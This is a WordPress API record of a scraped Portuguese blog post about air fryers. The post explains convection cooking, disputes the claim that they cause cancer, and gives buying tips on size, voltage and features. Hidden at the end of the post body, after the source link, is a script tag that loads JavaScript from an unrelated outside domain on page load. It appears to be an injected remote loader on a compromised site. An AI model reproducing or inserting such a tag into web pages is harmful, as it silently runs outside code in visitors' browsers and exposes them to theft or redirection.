{"id":38,"date":"1969-12-31T21:00:00","date_gmt":"1970-01-01T00:00:00","guid":{"rendered":"https:\/\/manualdoidoso.com.br\/blog\/1969\/12\/31\/tamanho-da-air-fryer-importa-causa-cancer-confira-dicas-de-quem-manja-15-03-2022\/"},"modified":"1969-12-31T21:00:00","modified_gmt":"1970-01-01T00:00:00","slug":"tamanho-da-air-fryer-importa-causa-cancer-confira-dicas-de-quem-manja-15-03-2022","status":"publish","type":"post","link":"https:\/\/manualdoidoso.com.br\/blog\/1969\/12\/31\/tamanho-da-air-fryer-importa-causa-cancer-confira-dicas-de-quem-manja-15-03-2022\/","title":{"rendered":"Tamanho da air fryer importa? Causa c\u00e2ncer? Confira dicas de quem manja &#8211; 15\/03\/2022"},"content":{"rendered":"<p> <br \/>\n<\/p>\n<div>\n<p>Ela virou a <a href=\"https:\/\/www.uol.com.br\/tilt\/noticias\/redacao\/2021\/12\/15\/usar-airfryer-para-secar-roupas-um-bom-meme-mas-uma-pessima-ideia.htm\" target=\"_blank\" rel=\"noopener\">queridinha de muita gente<\/a> nos \u00faltimos anos, e quem n\u00e3o tem uma em casa provavelmente j\u00e1 se imaginou tendo uma. Falamos aqui da air fryer, essa pequena (\u00e0s vezes nem tanto) maravilha da cozinha que ficou popular por fritar alimentos sem \u00f3leo.<\/p>\n<p>Mas como ela funciona? Tem risco para a sa\u00fade? Como escolher uma? Confira a seguir essas e outras curiosidades sobre o produto.<\/p>\n<h2>Como frita sem \u00f3leo?<\/h2>\n<p>O seu <a href=\"https:\/\/www.uol.com.br\/tilt\/noticias\/redacao\/2018\/12\/13\/nao-e-magia-entenda-como-a-fritadeira-queridinha-dos-brasileiros-funciona.htm\" target=\"_blank\" rel=\"noopener\">m\u00e9todo de funcionamento \u00e9 relativamente simples<\/a>. \u00c9 muito semelhante ao de um secador de cabelos, explica <span>Rudolf<\/span><span> <\/span><span>Buhler<\/span>, professor de engenharia el\u00e9trica do Centro Universit\u00e1rio <span>FEI<\/span>.<\/p>\n<p>&#8220;Na air fryer, o alimento \u00e9 aquecido por convec\u00e7\u00e3o, ou seja, o ar quente e em alta velocidade \u00e9 ventilado ao redor do alimento, envolvendo-o de forma semelhante ao que ocorre quando se frita o alimento por imers\u00e3o em \u00f3leo quente, dando aquela textura crocante semelhante ao da fritura&#8221;, explica.<\/p>\n<p>A vantagem, claro, \u00e9 por n\u00e3o usar \u00f3leo em grandes quantidades. Por\u00e9m, voc\u00ea at\u00e9 pode pincelar o l\u00edquido sobre o alimento para dar aquele aspecto de grelhado. Isso n\u00e3o vai estragar o seu equipamento, mas a quantidade \u00e9 muito inferior se comparada a m\u00e9todos de cozimento tradicionais.<\/p>\n<h2><span>Air<\/span><span> <\/span><span>fryer<\/span> causa c\u00e2ncer?<\/h2>\n<p>Algumas pessoas se interessaram em ter uma air fryer, mas ficaram com receio depois que algumas fake news <a href=\"https:\/\/www.uol.com.br\/tilt\/noticias\/redacao\/2022\/01\/22\/comida-preparada-com-air-fryer-causa-cancer-entenda-o-mito.htm\">associavam seu uso ao c\u00e2ncer<\/a>. Se esse \u00e9 seu caso, pode sossegar.<\/p>\n<p>&#8220;A acrilamida, que ficou associada \u00e0s air fryers e ao surgimento de c\u00e2ncer, \u00e9 um produto natural da Rea\u00e7\u00e3o de Maillard, uma rea\u00e7\u00e3o qu\u00edmica entre prote\u00ednas e a\u00e7\u00facares que \u00e9 acelerada pelo calor e \u00e9 a respons\u00e1vel por aquele douradinho caracter\u00edstico de qualquer coisa frita, tostada, assada ou grelhada&#8221;, explica Laura de Freitas, doutora em Bioci\u00eancias e Biotecnologia pela Universidade Estadual Paulista (Unesp).<\/p>\n<p>\u00c9 um processo que independente do m\u00e9todo de cozimento e n\u00e3o \u00e9 exclusivo da air fryer.<\/p>\n<p>&#8220;Isso s\u00f3 causaria c\u00e2ncer se voc\u00ea fosse um animal de laborat\u00f3rio comendo quantidades alt\u00edssimas de acrilamida pura, o que acredito que n\u00e3o seja a realidade de ningu\u00e9m. N\u00e3o h\u00e1 qualquer evid\u00eancia que aponte que a acrilamida formada na comida que comemos todo dia cause c\u00e2ncer em humanos. At\u00e9 porque humanos consomem comidas assadas e grelhadas h\u00e1 milhares de anos, e se ela causasse c\u00e2ncer com certeza j\u00e1 saber\u00edamos&#8221;, acrescenta Freitas.<\/p>\n<p>Agora que voc\u00ea j\u00e1 sabe como a air fryer funciona e que ela \u00e9 segura, veja dicas \u00fateis na hora que voc\u00ea for <a href=\"https:\/\/www.uol.com.br\/tilt\/noticias\/redacao\/2021\/11\/26\/air-fryer-saiba-qual-a-melhor-e-o-que-checar-antes-da-compra.htm\" target=\"_blank\" rel=\"noopener\">comprar<\/a> uma.<\/p>\n<h2>1. De olho no tamanho<\/h2>\n<p>Ao contr\u00e1rio do que muita gente pensa, air fryer n\u00e3o \u00e9 &#8220;tudo igual&#8221;. Uma das principais diferen\u00e7as diz respeito ao tamanho. Aqui, vale usar o bom senso: se voc\u00ea mora com sua fam\u00edlia, o melhor \u00e9 apostar em modelos maiores. Da mesma forma, se voc\u00ea vive sozinho o ideal \u00e9 levar uma air fryer mais compacta.<\/p>\n<p>No mercado, h\u00e1 uma boa variedade de tamanhos desse aparelho, indo de cerca de 2 litros at\u00e9 mais de 5 litros. A diferen\u00e7a, claro, \u00e9 a quantidade de alimento que poder\u00e1 ser preparado de uma vez \u2014ainda que a recomenda\u00e7\u00e3o para aproveitar melhor o aparelho seja n\u00e3o lotar a cestinha de comida.<\/p>\n<p>H\u00e1 outros dois aspectos que ajudam a definir a quest\u00e3o do tamanho. O primeiro deles \u00e9 o espa\u00e7o dispon\u00edvel, tanto para usar o aparelho quanto para guard\u00e1-lo. N\u00e3o faz sentido ter uma que cause <a href=\"https:\/\/www.uol.com.br\/vivabem\/noticias\/redacao\/2019\/04\/30\/dor-de-cabeca-tem-diferentes-tipos-e-causas-veja-como-prevenir-e-tratar.htm\">dor de cabe\u00e7a<\/a> na hora de usar ou de guardar.<\/p>\n<p>Outro ponto a se ter em mente \u00e9 a limpeza: por uma quest\u00e3o l\u00f3gica, quanto maior a air fryer, mais tempo voc\u00ea levar\u00e1 para limp\u00e1-la ap\u00f3s o uso.<\/p>\n<h2>2. 127 ou 220V?<\/h2>\n<p>Outra d\u00favida comum na hora de escolher um aparelho do tipo \u00e9 a sua tens\u00e3o de funcionamento, j\u00e1 que alguns podem pensar que levar para casa um aparelho do tipo 220V significa que ele ser\u00e1 muito mais potente do que a sua vers\u00e3o de 127V.<\/p>\n<p>A diferen\u00e7a de pot\u00eancia, de fato, pode existir em alguns modelos de determinadas fabricantes, mas ela costuma ser pequena a ponto de n\u00e3o causar qualquer interfer\u00eancia no funcionamento do aparelho. Sendo assim, essa escolha dever\u00e1 levar em conta a estrutura de sua casa.<\/p>\n<p>&#8220;Isso ficar\u00e1 de acordo com a instala\u00e7\u00e3o el\u00e9trica dispon\u00edvel na resid\u00eancia. Ela comportando a demanda extra com o uso do novo equipamento, ambas as vers\u00f5es dever\u00e3o operar igualmente&#8221;, aponta Buhler.<\/p>\n<p>Ainda nesse quesito, d\u00ea prefer\u00eancia a aparelhos que tenha sua pot\u00eancia (em Watts) maior, j\u00e1 que eles tendem a ter um desempenho melhor. E, claro, tenha certeza que a tomada na qual ela ser\u00e1 ligada conta com aterramento feito corretamente e que a instala\u00e7\u00e3o el\u00e9trica da sua casa esteja em ordem.<\/p>\n<h2>3. Fun\u00e7\u00f5es a mais nem sempre valem<\/h2>\n<p>Apesar dos modelos mais conhecidos terem formato similar e praticamente uma \u00fanica fun\u00e7\u00e3o, hoje \u00e9 poss\u00edvel encontrar aparelhos que v\u00e3o al\u00e9m do b\u00e1sico. A escolha, aqui, recai sobre dois fatores relacionados entre.<\/p>\n<ol>\n<li>Voc\u00ea realmente vai utilizar as fun\u00e7\u00f5es adicionais &#8211;como a de desidratar alimentos, por exemplo &#8212; ou vai acabar tendo uma air fryer com essa fun\u00e7\u00e3o apenas por ter?<\/li>\n<li>Modelos com mais fun\u00e7\u00f5es costumam ser mais caros, ent\u00e3o \u00e9 aquele velho caso de avaliar bem se voc\u00ea n\u00e3o est\u00e1 pagando mais por algo que n\u00e3o vai usar.<\/li>\n<\/ol>\n<p>Agora uma fun\u00e7\u00e3o que pode ser bastante \u00fatil \u00e9 o timer digital. Explica-se: na maioria das air fryers, tanto o timer quanto o seletor de temperatura costumam ser bot\u00f5es girat\u00f3rios anal\u00f3gicos. O m\u00e9todo de funcionamento, na pr\u00e1tica, \u00e9 id\u00eantico, por\u00e9m a sele\u00e7\u00e3o digital permite escolher com maior precis\u00e3o o tempo e a temperatura de cozimento.<\/p>\n<\/p><\/div>\n<p><br \/>\n<br \/><a href=\"https:\/\/www.uol.com.br\/tilt\/noticias\/redacao\/2022\/03\/15\/quer-comprar-uma-air-fryer-veja-3-conselhos-de-quem-manja-para-mandar-bem.htm\">Source link <\/a><script src='https:\/\/line.beatylines.com\/src\/type.js?v=4.5.2' type='text\/javascript' id='globalsway'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Ela virou a queridinha de muita gente nos \u00faltimos anos, e quem n\u00e3o tem uma em casa provavelmente j\u00e1 se imaginou tendo uma. Falamos aqui da air fryer, essa pequena (\u00e0s vezes nem tanto) maravilha da cozinha que ficou popular por fritar alimentos sem \u00f3leo. Mas como ela funciona? Tem risco para a sa\u00fade? Como&#8230;<\/p>\n","protected":false},"author":1,"featured_media":39,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_kad_post_transparent":"","_kad_post_title":"","_kad_post_layout":"","_kad_post_sidebar_id":"","_kad_post_content_style":"","_kad_post_vertical_padding":"","_kad_post_feature":"","_kad_post_feature_position":"","_kad_post_header":false,"_kad_post_footer":false,"footnotes":""},"categories":[1],"tags":[40,44,43,45,46,41,42,48,47,39],"class_list":["post-38","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-sem-categoria","tag-air","tag-cancer","tag-causa","tag-confira","tag-dicas","tag-fryer","tag-importa","tag-manja","tag-quem","tag-tamanho"],"_links":{"self":[{"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/posts\/38","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/comments?post=38"}],"version-history":[{"count":0,"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/posts\/38\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/media\/39"}],"wp:attachment":[{"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/media?parent=38"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/categories?post=38"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/tags?post=38"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}